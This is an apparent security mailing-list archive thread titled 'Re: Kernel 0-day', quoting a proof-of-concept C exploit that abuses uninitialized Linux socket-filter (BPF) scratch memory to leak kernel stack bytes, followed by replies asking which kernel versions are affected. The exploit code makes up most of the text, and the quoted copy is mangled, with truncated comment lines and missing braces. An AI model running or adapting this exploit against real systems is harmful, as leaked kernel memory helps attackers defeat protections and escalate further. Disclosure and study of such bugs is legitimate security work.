[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Kernel 0-day


    What kernel versions are vulnerable to this one ?


On 10/11/2010 17:05, James Lay wrote:
What kernel version(s) is/are impacted?  Tried on one and no workie.


On 11/9/10 3:18 PM, "Dan Rosenberg"<dan.j.rosenberg@xxxxxxxxx>  wrote:



* You've done it.  After hours of gdb and caffeine, you've finally got a
* on your target's server.  Maybe next time they will think twice about
* running MyFirstCompSciProjectFTPD on a production machine.  As you take
* another sip of Mountain Dew and pick some of the cheetos out of your
* you begin to plan your next move - it's time to tackle the kernel.
* What should be your goal?  Privilege escalation?  That's impossible,
* no such thing as a privilege escalation vulnerability on Linux.
Denial of
* service?  What are you, some kind of script kiddie?  No, the answer is
* obvious.  You must read the uninitialized bytes of the kernel stack,
* these bytes contain all the secrets of the universe and the meaning of
* How can you accomplish this insidious feat?  You immediately discard
* notion of looking for uninitialized struct members that are copied
back to
* userspace, since you clearly need something far more elite.  In order
* prove your superiority, your exploit must be as sophisticated as your
* in obscure electronic music.  After scanning the kernel source for good
* candidates, you find your target and begin to code...
* by Dan Rosenberg
* Greets to kees, taviso, jono, spender, hawkes, and bla


#define PORT 37337

int transfer(int sendsock, int recvsock)

    struct sockaddr_in addr;
    char buf[512];
    int len = sizeof(addr);

    memset(buf, 0, sizeof(buf));

    if (fork())
        return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr,


    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr("");

    sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);



int main(int argc, char * argv[])

    int sendsock, recvsock, ret;
    unsigned int val;
    struct sockaddr_in addr;
    struct sock_fprog fprog;
    struct sock_filter filters[5];

    if (argc != 2) {
        printf("[*] Usage: %s offset (0-63)\n", argv[0]);
        return -1;

    val = atoi(argv[1]);

    if (val>  63) {
        printf("[*] Invalid byte offset (must be 0-63)\n");
        return -1;

    recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

    if (recvsock<  0 || sendsock<  0) {
        printf("[*] Could not create sockets.\n");
        return -1;

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = htonl(INADDR_ANY);

    if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr))<  0) {
        printf("[*] Could not bind socket.\n");
        return -1;

    memset(&fprog, 0, sizeof(fprog));
    memset(filters, 0, sizeof(filters));

    filters[0].code = BPF_LD|BPF_MEM;
    filters[0].k = (val&  ~0x3) / 4;

    filters[1].code = BPF_ALU|BPF_AND|BPF_K;
    filters[1].k = 0xff<<  ((val % 4) * 8);

    filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
    filters[2].k = (val % 4) * 8;

    filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
    filters[3].k = 256;

    filters[4].code = BPF_RET|BPF_A;

    fprog.len = 5;
    fprog.filter = filters;

    if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER,&fprog,
sizeof(fprog))<  0) {
        printf("[*] Failed to install filter.\n");
        return -1;

    ret = transfer(sendsock, recvsock);

    printf("[*] Your byte: 0x%.02x\n", ret - 248);


Felipe Martins<BR>
Security Analyst<BR>
E-mail: martins.felipe.security@xxxxxxxxx<BR>
Skype: martins.felipe<BR>